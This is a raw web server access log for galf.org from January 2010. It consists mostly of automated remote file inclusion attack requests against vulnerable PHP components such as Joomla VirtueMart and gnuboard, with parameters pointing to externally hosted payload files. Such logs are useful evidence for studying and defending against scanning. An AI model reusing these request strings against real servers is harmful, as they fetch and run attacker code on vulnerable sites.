125.141.91.138 - - [24/Jan/2010:23:15:01 -0800] "GET /logs/access_090914.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [24/Jan/2010:23:15:20 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [24/Jan/2010:23:15:20 -0800] "GET /logs/access_091123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [24/Jan/2010:23:15:20 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [24/Jan/2010:23:15:20 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.135.199 - - [24/Jan/2010:23:16:22 -0800] "GET /comment_modify.php?dir=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.135.199 - - [24/Jan/2010:23:16:22 -0800] "GET /logs/access_091026.log%20%20//comment_modify.php?dir=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.135.199 - - [24/Jan/2010:23:16:22 -0800] "GET /logs//comment_modify.php?dir=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [24/Jan/2010:23:16:55 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [24/Jan/2010:23:16:55 -0800] "GET /logs/access_090720.log//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [24/Jan/2010:23:16:56 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:18:14 -0800] "GET /logs/access_091102.log/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:18:14 -0800] "GET /index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:18:14 -0800] "GET /logs/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:18:25 -0800] "GET /index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:18:25 -0800] "GET /logs/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:18:25 -0800] "GET /logs/access_091102.log/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:23:18:30 -0800] "GET /logs//gnuboard4//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:23:18:30 -0800] "GET /gnuboard4//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:23:18:30 -0800] "GET /logs/access.log%20%20//gnuboard4//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
139.146.140.227 - - [24/Jan/2010:23:19:10 -0800] "GET /logs/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:19:10 -0800] "GET /logs/access_091102.log%20%20/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:19:10 -0800] "GET /index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:19:15 -0800] "GET /logs/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:19:15 -0800] "GET /logs/access_091102.log%20%20/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:19:15 -0800] "GET /index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [24/Jan/2010:23:19:27 -0800] "GET /gnuboard4//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:23:19:27 -0800] "GET /logs//gnuboard4//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [24/Jan/2010:23:19:27 -0800] "GET /logs/access.log%20%20//gnuboard4//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.98.1.242 - - [24/Jan/2010:23:20:27 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.98.1.242 - - [24/Jan/2010:23:20:27 -0800] "GET /logs/access_090810.log//modules/4nAlbum/public/displayCategory.php?basepath=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.98.1.242 - - [24/Jan/2010:23:20:27 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://gesprachen.wewillhostit.com/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:21:59 -0800] "GET /logs/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:21:59 -0800] "GET /index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:21:59 -0800] "GET /logs/access_091102.log%20%20/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:22:07 -0800] "GET /logs/access_091102.log%20%20/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:22:07 -0800] "GET /index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:22:07 -0800] "GET /logs/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.175.110 - - [24/Jan/2010:23:24:44 -0800] "GET /logs/access_091026.log%20%20//comment_modify.php?dir=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.175.110 - - [24/Jan/2010:23:24:44 -0800] "GET /logs//comment_modify.php?dir=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.175.110 - - [24/Jan/2010:23:24:45 -0800] "GET /comment_modify.php?dir=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
206.225.93.58 - - [24/Jan/2010:23:26:32 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
206.225.93.58 - - [24/Jan/2010:23:26:32 -0800] "GET /logs/access_091130.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
206.225.93.58 - - [24/Jan/2010:23:26:32 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
206.225.93.58 - - [24/Jan/2010:23:26:50 -0800] "GET /logs/access_091123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.47.80.39 - - [24/Jan/2010:23:27:58 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.galf.org"
65.55.106.138 - - [24/Jan/2010:23:30:38 -0800] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
222.122.25.99 - - [24/Jan/2010:23:31:25 -0800] "GET /logs/access.log//components/com_virtuemart/errors.php?error=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.25.99 - - [24/Jan/2010:23:31:25 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.25.99 - - [24/Jan/2010:23:31:25 -0800] "GET /components/com_virtuemart/errors.php?error=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.25.99 - - [24/Jan/2010:23:31:31 -0800] "GET /components/com_virtuemart/errors.php?error=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.25.99 - - [24/Jan/2010:23:31:31 -0800] "GET /logs/access.log//components/com_virtuemart/errors.php?error=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.25.99 - - [24/Jan/2010:23:31:31 -0800] "GET /logs//components/com_virtuemart/errors.php?error=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:36:09 -0800] "GET /logs/access_091102.log/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
139.146.140.227 - - [24/Jan/2010:23:36:27 -0800] "GET /logs/access_091102.log/index1.php?page=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [24/Jan/2010:23:36:54 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [24/Jan/2010:23:36:54 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [24/Jan/2010:23:36:55 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:23:37:18 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:23:37:18 -0800] "GET /index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:23:37:18 -0800] "GET /index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
85.94.33.242 - - [24/Jan/2010:23:37:18 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig.absolute.path=http://www.alst.ru/cmd??&cmd=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
211.95.78.56 - - [24/Jan/2010:23:44:12 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [24/Jan/2010:23:44:12 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [24/Jan/2010:23:44:12 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.dsweb.co.kr//data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [24/Jan/2010:23:57:57 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:13 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:13 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:13 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:18 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:18 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:18 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:25 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:25 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:25 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:27 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:27 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:29 -0800] "GET /logs/access_090720.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:31 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:36 -0800] "GET /logs/access_090720.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:44 -0800] "GET /logs/access_090720.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:44 -0800] "GET /logs/access_090720.log/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:58 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:58 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:58:58 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:59:00 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:59:00 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:59:01 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:05 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:59:08 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:59:08 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:59:08 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:12 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:20 -0800] "GET /logs/access_090727.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:20 -0800] "GET /logs/access_091012.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:25 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:25 -0800] "GET /logs/access_090713.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:35 -0800] "GET /logs/access_091207.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:35 -0800] "GET /logs/access_090928.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:35 -0800] "GET /logs/access_091005.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:50 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
210.205.6.233 - - [24/Jan/2010:23:59:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nba-news.net//images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
125.141.91.138 - - [24/Jan/2010:23:59:51 -0800] "GET /?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:59:51 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [24/Jan/2010:23:59:51 -0800] "GET /logs/?sourcedir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:05 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:05 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:05 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:07 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:07 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:07 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:07 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:07 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:07 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:12 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:12 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:12 -0800] "GET /logs/access_090817.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:12 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:12 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:12 -0800] "GET /logs/access_090817.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:12 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:12 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:00:00:12 -0800] "GET /logs/access_090817.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
